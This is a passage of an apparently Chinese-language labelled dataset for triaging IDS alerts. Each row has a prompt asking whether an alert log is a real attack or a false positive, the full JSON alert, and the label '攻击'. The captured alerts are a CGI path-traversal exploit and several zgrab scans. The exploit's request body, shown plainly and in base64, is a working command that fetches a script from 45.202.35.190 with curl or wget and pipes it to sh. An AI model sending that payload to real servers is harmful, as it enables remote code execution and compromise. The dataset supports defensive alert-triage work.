"{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"hw_type\": \"PC\"}}", "sport": "38326", "h_url": "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732672214", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "目录遍历", "_origin": {"write_date": 1732672214, "vuln_harm": "路径穿越攻击可以泄露敏感文件信息。", "rule_version_str": "3.0.1122.14572", "hit_field": "", "dip": "172.31.193.222", "site_app": "", "hit_end": 0, "uri": "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh", "dport": 80, "vuln_name": "路径穿越攻击(机器学习)", "rsp_status": 0, "code_language": "", "solution": "1.对用户的输入进行验证,特别是路径替代目录跳转符\r\n2.尽可能采用白名单的形式,验证所有输入,对输入参数过滤../等字符。\r\n3.合理配置web服务器的目录权限,禁止目录遍历。", "hit_start": 0, "detail_info": "通过机器学习方式,检测到访问中存在路径穿越攻击或扫描代码。", "xff": "", "sip": "101.47.73.76", "vuln_desc": "通过机器学习方式,检测到访问中存在路径穿越攻击或扫描代码。", "public_date": "2020-11-25 19:44:53", "sport": 38326}, "detail_info": "通过机器学习方式,检测到访问中存在路径穿越攻击或扫描代码。", "file_md5": "", "rule_key": "webids", "connection": "keep-alive", "api": "218.76.15.16:80/cgi-bin/../../../../../../../../../../bin/sh", "first_access_time": "2024-11-27 09:50:14", "hazard_level": "4", "hazard_rating": "中危", "hit_field": "", "h_method": "POST", "sip_addr": "中国--广东省--广州市", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "路径穿越攻击(机器学习)", "alarm_sip": "172.31.193.222", "skyeye_index": "", "sip_ioc_dip": "856fb2187ceddf6e80a4f5b2d99605c2", "xff": "", "vuln_desc": "通过机器学习方式,检测到访问中存在路径穿越攻击或扫描代码。", "attack_chain": "0x02010000", "vuln_harm": "路径穿越攻击可以泄露敏感文件信息。", "dport": "80", "alert_devip": "172.31.191.57", "update_time": "1732672194", "code_language": "", "public_date": "2020-11-25 19:44:53", "skyeye_serial_num": "QbJK/8ze/", "site_app": "", "super_attack_chain": "0x02000000", "hit_end": "0", "h_proto_version": "HTTP/1.1", "uri": "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10020b6b", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "101.47.73.76", "host_md5": "dc31e34f985c6c605c86e0f909e8eebe", "user-agent": "Custom-AsyncHttpClient", "vlan_id": "", "vuln_type": "路径穿越攻击(机器学习)", "attack_type": "目录遍历", "is_web_attack": "1", "dip": "172.31.193.222", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "1.对用户的输入进行验证,特别是路径替代目录跳转符\r\n2.尽可能采用白名单的形式,验证所有输入,对输入参数过滤../等字符。\r\n3.合理配置web服务器的目录权限,禁止目录遍历。", "hit_start": "0", "skyeye_id": "", "payload": {"req_header": "UE9TVCAvY2dpLWJpbi8uJTJlLy4lMmUvLiUyZS8uJTJlLy4lMmUvLiUyZS8uJTJlLy4lMmUvLiUyZS8uJTJlL2Jpbi9zaCBIVFRQLzEuMQ0KSG9zdDogMjE4Ljc2LjE1LjE2OjgwDQpBY2NlcHQ6ICovKg0KVXBncmFkZS1JbnNlY3VyZS1SZXF1ZXN0czogMQ0KVXNlci1BZ2VudDogQ3VzdG9tLUFzeW5jSHR0cENsaWVudA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQ29udGVudC1UeXBlOiB0ZXh0L3BsYWluDQpDb250ZW50LUxlbmd0aDogMTAzDQoNCg==", "req_body": "WD0kKGN1cmwgaHR0cDovLzQ1LjIwMi4zNS4xOTAvc2ggfHwgd2dldCBodHRwOi8vNDUuMjAyLjM1LjE5MC9zaCAtTy0pOyBlY2hvICIkWCIgfCBzaCAtcyBhcGFjaGUuc2VsZnJlcA==", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.16:80", "host_state": "失败", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_bbf9b8c065bb9d65ba74bce9cba7c1cf", "access_time": "2024-11-27 09:50:14", "content-length": "103", "attack_addr": "中国--广东省--广州市(23.116548/113.295827)", "type_chain": "160B0000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "content-type": "text/plain", "sip": "101.47.73.76", "dimension": "3", "url_path": "/cgi-bin/../../../../../../../../../../bin/sh", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1\r\nHost: 218.76.15.16:80\r\nAccept: */*\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Custom-AsyncHttpClient\r\nConnection: keep-alive\r\nContent-Type: text/plain\r\nContent-Length: 103\r\n\r\n", "req_body": "X=$(curl http://45.202.35.190/sh || wget http://45.202.35.190/sh -O-); echo \"$X\" | sh -s apache.selfrep", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268569451-路径穿越攻击(机器学习)", "rule_labels": "{}", "sport": "38326", "h_url": "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732672214", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "命令执行", "_origin": {"write_date": 1732672214, "vuln_harm": "受害主机能被植入后门、远控或木马,导致受害主机已经沦陷,成为傀儡机。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_body", "dip": "172.31.193.222", "site_app": "通用", "hit_end": 11, "uri": "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh", "dport": 80, "vuln_name": "通用命令执行漏洞", "rsp_status": 0, "code_language": "通用", "solution": "请尽快排查受害主机上是否存在相关恶意程序并进行查杀,并修复系统漏洞。", "hit_start": 0, "detail_info": "攻击者已经能够执行任意系统命令。", "xff": "", "sip": "101.47.73.76", "vuln_desc": "攻击者已经能够执行任意系统命令。", "public_date": "2019-05-13 18:09:13", "sport": 38326}, "detail_info": "攻击者已经能够执行任意系统命令。", "file_md5": "", "rule_key": "webids", "connection": "keep-alive", "api": "218.76.15.16:80/cgi-bin/../../../../../../../../../../bin/sh", "first_access_time": "2024-11-27 09:50:14", "hazard_level": "8", "hazard_rating": "危急", "hit_field": "req_body", "h_method": "POST", "sip_addr": "中国--广东省--广州市", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "通用命令执行漏洞", "alarm_sip": "172.31.193.222", "skyeye_index": "", "sip_ioc_dip": "86294d29dc262285437b580b26eb66c7", "xff": "", "vuln_desc": "攻击者已经能够执行任意系统命令。", "attack_chain": "0x02020000", "vuln_harm": "受害主机能被植入后门、远控或木马,导致受害主机已经沦陷,成为傀儡机。", "dport": "80", "alert_devip": "172.31.191.57", "update_time": "1732672192", "code_language": "通用", "public_date": "2019-05-13 18:09:13", "skyeye_serial_num": "QbJK/8ze/", "site_app": "通用", "super_attack_chain": "0x02000000", "hit_end": "11", "h_proto_version": "HTTP/1.1", "uri": "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x100215d7", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "101.47.73.76", "host_md5": "dc31e34f985c6c605c86e0f909e8eebe", "user-agent": "Custom-AsyncHttpClient", "vlan_id": "", "vuln_type": "通用命令执行漏洞", "attack_type": "命令执行", "is_web_attack": "1", "dip": "172.31.193.222", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "请尽快排查受害主机上是否存在相关恶意程序并进行查杀,并修复系统漏洞。", "hit_start": "0", "skyeye_id": "", "payload": {"req_header": "UE9TVCAvY2dpLWJpbi8uJTJlLy4lMmUvLiUyZS8uJTJlLy4lMmUvLiUyZS8uJTJlLy4lMmUvLiUyZS8uJTJlL2Jpbi9zaCBIVFRQLzEuMQ0KSG9zdDogMjE4Ljc2LjE1LjE2OjgwDQpBY2NlcHQ6ICovKg0KVXBncmFkZS1JbnNlY3VyZS1SZXF1ZXN0czogMQ0KVXNlci1BZ2VudDogQ3VzdG9tLUFzeW5jSHR0cENsaWVudA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQ29udGVudC1UeXBlOiB0ZXh0L3BsYWluDQpDb250ZW50LUxlbmd0aDogMTAzDQoNCg==", "req_body": "WD0kKGN1cmwgaHR0cDovLzQ1LjIwMi4zNS4xOTAvc2ggfHwgd2dldCBodHRwOi8vNDUuMjAyLjM1LjE5MC9zaCAtTy0pOyBlY2hvICIkWCIgfCBzaCAtcyBhcGFjaGUuc2VsZnJlcA==", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.16:80", "host_state": "失败", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_38ddb3cb8cbfa778a3016afb13b93ee2", "access_time": "2024-11-27 09:50:14", "content-length": "103", "attack_addr": "中国--广东省--广州市(23.116548/113.295827)", "type_chain": "16090000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "content-type": "text/plain", "sip": "101.47.73.76", "dimension": "3", "url_path": "/cgi-bin/../../../../../../../../../../bin/sh", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1\r\nHost: 218.76.15.16:80\r\nAccept: */*\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Custom-AsyncHttpClient\r\nConnection: keep-alive\r\nContent-Type: text/plain\r\nContent-Length: 103\r\n\r\n", "req_body": "X=$(curl http://45.202.35.190/sh || wget http://45.202.35.190/sh -O-); echo \"$X\" | sh -s apache.selfrep", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268572119-通用命令执行漏洞", "rule_labels": "{\"0x110700\": {\"parent_name\": \"\", \"type\": \"\", \"name\": \"二次访问分析\", \"parent_id\": \"0\", \"info\": \"45.202.35.190\", \"proto\": \"TCP\"}, \"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"hw_type\": \"PC\"}}", "sport": "38326", "h_url": "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732663491", "vlan_id": "", "vuln_type": "发现扫描工具-zgrab", "rule_version_str": "3.0.1122.14572", "attack_type": "黑市工具", "dip_group": "未分配资产组", "is_web_attack": "1", "nid": "", "dip": "172.31.193.55", "sip_group": "", "repeat_count": "1", "type": "黑市工具", "skyeye_type": "webids-webattack_dolog", "_origin": {"write_date": 1732663491, "vuln_harm": "攻击者可以利用该工具收集目标信息。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.31.193.55", "site_app": "", "hit_end": 79, "uri": "/actuator/health", "dport": 80, "vuln_name": "发现扫描工具-zgrab", "rsp_status": 0, "code_language": "", "solution": "关闭不必要的端口。", "hit_start": 59, "detail_info": "Zgrab是一款使用GO编写的基于ZMap无状态扫描的应用层扫描器,可以自定义数据包以及ip、domain之间的关联。可用于快速指纹识别爆破等场景。最新的zgrab2已经替代zgrab。", "xff": "", "sip": "20.225.1.106", "vuln_desc": "Zgrab是一款使用GO编写的基于ZMap无状态扫描的应用层扫描器,可以自定义数据包以及ip、domain之间的关联。可用于快速指纹识别爆破等场景。最新的zgrab2已经替代zgrab。", "public_date": "2023-03-17 16:17:23", "sport": 34134}, "solution": "关闭不必要的端口。", "hit_start": "59", "skyeye_id": "", "payload": {"req_header": "R0VUIC9hY3R1YXRvci9oZWFsdGggSFRUUC8xLjENCkhvc3Q6IDIxOC43Ni4xNS4xMA0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgemdyYWIvMC54DQpBY2NlcHQ6ICovKg0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQoNCg==", "req_body": "", "rsp_header": "", "rsp_body": ""}, "detail_info": "Zgrab是一款使用GO编写的基于ZMap无状态扫描的应用层扫描器,可以自定义数据包以及ip、domain之间的关联。可用于快速指纹识别爆破等场景。最新的zgrab2已经替代zgrab。", "file_md5": "", "host": "218.76.15.10", "host_state": "失败", "rule_key": "webids", "api": "218.76.15.10/actuator/health", "first_access_time": "2024-11-27 07:24:51", "hazard_level": "2", "hazard_rating": "低危", "hit_field": "req_header", "rsp_body": "", "h_method": "GET", "sip_addr": "美国", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "发现扫描工具-zgrab", "alarm_sip": "172.31.193.55", "rule_desc": "网页漏洞利用", "skyeye_index": "", "sip_ioc_dip": "3d28abbbf5dceb39d665eb7e828f28cb", "proto": "http", "xff": "", "alarm_id": "20241127_3f99a6a88956a18ab094543ed3a0b173", "vuln_desc": "Zgrab是一款使用GO编写的基于ZMap无状态扫描的应用层扫描器,可以自定义数据包以及ip、domain之间的关联。可用于快速指纹识别爆破等场景。最新的zgrab2已经替代zgrab。", "attack_chain": "0x01050000", "access_time": "2024-11-27 07:24:51", "attack_addr": "美国(39.765054/-101.407912)", "type_chain": "140E0000", "vuln_harm": "攻击者可以利用该工具收集目标信息。", "dip_addr": "局域网", "dport": "80", "alert_devip": "172.31.191.57", "rsp_status": "0", "update_time": "1732663471", "code_language": "", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "sip": "20.225.1.106", "public_date": "2023-03-17 16:17:23", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "url_path": "/actuator/health", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "高", "rsp_header": "", "super_type": "恶意软件", "site_app": "", "super_attack_chain": "0x01000000", "hit_end": "79", "h_proto_version": "HTTP/1.1", "serial_num": "QbJK/8ze/", "uri": "/actuator/health", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "rule_id": "0x1002098e", "req_header": "GET /actuator/health HTTP/1.1\r\nHost: 218.76.15.10\r\nUser-Agent: Mozilla/5.0 zgrab/0.x\r\nAccept: */*\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "20.225.1.106", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268568974-发现扫描工具-zgrab", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"hw_type\": \"PC\"}}", "host_md5": "261f45f0acd69bc44c8fdeed8c4281bc", "sport": "34134", "h_url": "/actuator/health", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 zgrab/0.x"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732663430", "vlan_id": "", "vuln_type": "发现扫描工具-zgrab", "rule_version_str": "3.0.1122.14572", "attack_type": "黑市工具", "dip_group": "未分配资产组", "is_web_attack": "1", "nid": "", "dip": "172.23.64.208", "sip_group": "", "repeat_count": "1", "type": "黑市工具", "skyeye_type": "webids-webattack_dolog", "_origin": {"write_date": 1732663430, "vuln_harm": "攻击者可以利用该工具收集目标信息。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.23.64.208", "site_app": "", "hit_end": 79, "uri": "/actuator/health", "dport": 80, "vuln_name": "发现扫描工具-zgrab", "rsp_status": 0, "code_language": "", "solution": "关闭不必要的端口。", "hit_start": 59, "detail_info": "Zgrab是一款使用GO编写的基于ZMap无状态扫描的应用层扫描器,可以自定义数据包以及ip、domain之间的关联。可用于快速指纹识别爆破等场景。最新的zgrab2已经替代zgrab。", "xff": "", "sip": "20.225.1.106", "vuln_desc": "Zgrab是一款使用GO编写的基于ZMap无状态扫描的应用层扫描器,可以自定义数据包以及ip、domain之间的关联。可用于快速指纹识别爆破等场景。最新的zgrab2已经替代zgrab。", "public_date": "2023-03-17 16:17:23", "sport": 50446}, "solution": "关闭不必要的端口。", "hit_start": "59", "skyeye_id": "", "payload": {"req_header": "R0VUIC9hY3R1YXRvci9oZWFsdGggSFRUUC8xLjENCkhvc3Q6IDIxOC43Ni4xNS4xMg0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgemdyYWIvMC54DQpBY2NlcHQ6ICovKg0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQoNCg==", "req_body": "", "rsp_header": "", "rsp_body": ""}, "detail_info": "Zgrab是一款使用GO编写的基于ZMap无状态扫描的应用层扫描器,可以自定义数据包以及ip、domain之间的关联。可用于快速指纹识别爆破等场景。最新的zgrab2已经替代zgrab。", "file_md5": "", "host": "218.76.15.12", "host_state": "失败", "rule_key": "webids", "api": "218.76.15.12/actuator/health", "first_access_time": "2024-11-27 07:23:50", "hazard_level": "2", "hazard_rating": "低危", "hit_field": "req_header", "rsp_body": "", "h_method": "GET", "sip_addr": "美国", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "发现扫描工具-zgrab", "alarm_sip": "172.23.64.208", "rule_desc": "网页漏洞利用", "skyeye_index": "", "sip_ioc_dip": "69a5f50f5903638e84d1f4af64e7f5ad", "proto": "http", "xff": "", "alarm_id": "20241127_2cde985ceec871469c38b3df33e3a6c7", "vuln_desc": "Zgrab是一款使用GO编写的基于ZMap无状态扫描的应用层扫描器,可以自定义数据包以及ip、domain之间的关联。可用于快速指纹识别爆破等场景。最新的zgrab2已经替代zgrab。", "attack_chain": "0x01050000", "access_time": "2024-11-27 07:23:50", "attack_addr": "美国(39.765054/-101.407912)", "type_chain": "140E0000", "vuln_harm": "攻击者可以利用该工具收集目标信息。", "dip_addr": "局域网", "dport": "80", "alert_devip": "172.31.191.57", "rsp_status": "0", "update_time": "1732663410", "code_language": "", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "sip": "20.225.1.106", "public_date": "2023-03-17 16:17:23", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "url_path": "/actuator/health", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "高", "rsp_header": "", "super_type": "恶意软件", "site_app": "", "super_attack_chain": "0x01000000", "hit_end": "79", "h_proto_version": "HTTP/1.1", "serial_num": "QbJK/8ze/", "uri": "/actuator/health", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "rule_id": "0x1002098e", "req_header": "GET /actuator/health HTTP/1.1\r\nHost: 218.76.15.12\r\nUser-Agent: Mozilla/5.0 zgrab/0.x\r\nAccept: */*\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "20.225.1.106", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268568974-发现扫描工具-zgrab", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"hw_type\": \"PC\"}}", "host_md5": "8b2f76fd124ba4f8b9f28987a4504f66", "sport": "50446", "h_url": "/actuator/health", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 zgrab/0.x"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732663430", "vlan_id": "", "vuln_type": "发现扫描工具-zgrab", "rule_version_str": "3.0.1122.14572", "attack_type": "黑市工具", "dip_group": "未分配资产组", "is_web_attack": "1", "nid": "", "dip": "172.31.193.222", "sip_group": "", "repeat_count": "1", "type": "黑市工具", "skyeye_type": "webids-webattack_dolog", "_origin": {"write_date": 1732663430, "vuln_harm": "攻击者可以利用该工具收集目标信息。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.31.193.222", "site_app": "", "hit_end": 79, "uri": "/actuator/health", "dport": 80, "vuln_name": "发现扫描工具-zgrab", "rsp_status": 0, "code_language": "", "solution": "关闭不必要的端口。", "hit_start": 59, "detail_info": "Zgrab是一款使用GO编写的基于ZMap无状态扫描的应用层扫描器,可以自定义数据包以及ip、domain之间的关联。可用于快速指纹识别爆破等场景。最新的zgrab2已经替代zgrab。", "xff": "", "sip": "20.225.1.106", "vuln_desc": "Zgrab是一款使用GO编写的基于ZMap无状态扫描的应用层扫描器,可以自定义数据包以及ip、domain之间的关联。可用于快速指纹识别爆破等场景。最新的zgrab2已经替代zgrab。", "public_date": "2023-03-17 16:17:23", "sport": 35212}, "solution": "关闭不必要的端口。", "hit_start": "59", "skyeye_id": "", "payload": {"req_header": "R0VUIC9hY3R1YXRvci9oZWFsdGggSFRUUC8xLjENCkhvc3Q6IDIxOC43Ni4xNS4xNg0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgemdyYWIvMC54DQpBY2NlcHQ6ICovKg0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQoNCg==", "req_body": "", "rsp_header": "", "rsp_body": ""}, "detail_info": "Zgrab是一款使用GO编写的基于ZMap无状态扫描的应用层扫描器,可以自定义数据包以及ip、domain之间的关联。可用于快速指纹识别爆破等场景。最新的zgrab2已经替代zgrab。", "file_md5": "", "host": "218.76.15.16", "host_state": "失败", "rule_key": "webids", "api": "218.76.15.16/actuator/health", "first_access_time": "2024-11-27 07:23:50", "hazard_level": "2", "hazard_rating": "低危", "hit_field": "req_header", "rsp_body": "", "h_method": "GET", "sip_addr": "美国", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "发现扫描工具-zgrab", "alarm_sip": "172.31.193.222", "rule_desc": "网页漏洞利用", "skyeye_index": "", "sip_ioc_dip": "fde6a0b6729182eeab319706366c347d", "proto": "http", "xff": "", "alarm_id": "20241127_718e7d08f0081b3712ec590e867e037b", "vuln_desc": "Zgrab是一款使用GO编写的基于ZMap无状态扫描的应用层扫描器,可以自定义数据包以及ip、domain之间的关联。可用于快速指纹识别爆破等场景。最新的zgrab2已经替代zgrab。", "attack_chain": "0x01050000", "access_time": "2024-11-27 07:23:50", "attack_addr": "美国(39.765054/-101.407912)", "type_chain": "140E0000", "vuln_harm": "攻击者可以利用该工具收集目标信息。", "dip_addr": "局域网", "dport": "80", "alert_devip": "172.31.191.57", "rsp_status": "0", "update_time": "1732663410", "code_language": "", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "sip": "20.225.1.106", "public_date": "2023-03-17 16:17:23", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "url_path": "/actuator/health", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "高", "rsp_header": "", "super_type": "恶意软件", "site_app": "", "super_attack_chain": "0x01000000", "hit_end": "79", "h_proto_version": "HTTP/1.1", "serial_num": "QbJK/8ze/", "uri": "/actuator/health", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "rule_id": "0x1002098e", "req_header": "GET /actuator/health HTTP/1.1\r\nHost: 218.76.15.16\r\nUser-Agent: Mozilla/5.0 zgrab/0.x\r\nAccept: */*\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "20.225.1.106", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268568974-发现扫描工具-zgrab", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"hw_type\": \"PC\"}}", "host_md5": "5704a8d93ab5f08f2d5f86217a1377f4", "sport": "35212", "h_url": "/actuator/health", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 zgrab/0.x"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732663430", "vlan_id": "", "vuln_type": "发现扫描工具-zgrab", "rule_version_str": "3.0.1122.14572", "attack_type": "黑市工具", "dip_group": "未分配资产组", "is_web_attack": "1", "nid": "", "dip": "172.31.193.243", "sip_group": "", "repeat_count": "1", "type": "黑市工具", "skyeye_type": "webids-webattack_dolog", "_origin": {"write_date": 1732663430, "vuln_harm": "攻击者可以利用该工具收集目标信息。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.31.193.243", "site_app": "", "hit_end": 79, "uri": "/actuator/health", "dport": 80, "vuln_name": "发现扫描工具-zgrab", "rsp_status": 0, "code_language": "", "solution": "关闭不必要的端口。", "hit_start": 59, "detail_info": "Zgrab是一款使用GO编写的基于ZMap无状态扫描的应用层扫描器,可以自定义数据包以及ip、domain之间的关联。可用于快速指纹识别爆破等场景。最新的zgrab2已经替代zgrab。", "xff": "", "sip": "20.225.1.106", "vuln_desc": "Zgrab是一款使用GO编写的基于ZMap无状态扫描的应用层扫描器,可以自定义数据包以及ip、domain之间的关联。可用于快速指纹识别爆破等场景。最新的zgrab2已经替代zgrab。", "public_date": "2023-03-17 16:17:23", "sport": 49512}, "solution": "关闭不必要的端口。", "hit_start": "59", "skyeye_id": "", "payload": {"req_header": "R0VUIC9hY3R1YXRvci9oZWFsdGggSFRUUC8xLjENCkhvc3Q6IDIxOC43Ni4xNS4xNw0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgemdyYWIvMC54DQpBY2NlcHQ6ICovKg0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQoNCg==", "req_body": "", "rsp_header": "", "rsp_body": ""}, "detail_info": "Zgrab是一款使用GO编写的基于ZMap无状态扫描的应用层扫描器,可以自定义数据包以及ip、domain之间的关联。可用于快速指纹识别爆破等场景。最新的zgrab2已经替代zgrab。", "file_md5": "", "host": "218.76.15.17", "host_state": "失败", "rule_key": "webids", "api": "218.76.15.17/actuator/health", "first_access_time": "2024-11-27 07:23:50", "hazard_level": "2", "hazard_rating": "低危", "hit_field": "req_header", "rsp_body": "", "h_method": "GET", "sip_addr": "美国", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "发现扫描工具-zgrab", "alarm_sip": "172.31.193.243", "rule_desc": "网页漏洞利用", "skyeye_index": "", "sip_ioc_dip": "9fbfe9043e1bdeafb1c1e11ecf83f755", "proto": "http", "xff": "", "alarm_id": "20241127_93c80e00f15a736ba07483062afb20c3", "vuln_desc": "Zgrab是一款使用GO编写的基于ZMap无状态扫描的应用层扫描器,可以自定义数据包以及ip、domain之间的关联。可用于快速指纹识别爆破等场景。最新的zgrab2已经替代zgrab。", "attack_chain": "0x01050000", "access_time": "2024-11-27 07:23:50", "attack_addr": "美国(39.765054/-101.407912)", "type_chain": "140E0000", "vuln_harm": "攻击者可以利用该工具收集目标信息。", "dip_addr": "局域网", "dport": "80", "alert_devip": "172.31.191.57", "rsp_status": "0", "update_time": "1732663410", "code_language": "", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "sip": "20.225.1.106", "public_date": "2023-03-17 16:17:23", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "url_path": "/actuator/health", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "高", "rsp_header": "", "super_type": "恶意软件", "site_app": "", "super_attack_chain": "0x01000000", "hit_end": "79", "h_proto_version": "HTTP/1.1", "serial_num": "QbJK/8ze/", "uri": "/actuator/health", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "rule_id": "0x1002098e", "req_header": "GET /actuator/health HTTP/1.1\r\nHost: 218.76.15.17\r\nUser-Agent: Mozilla/5.0 zgrab/0.x\r\nAccept: 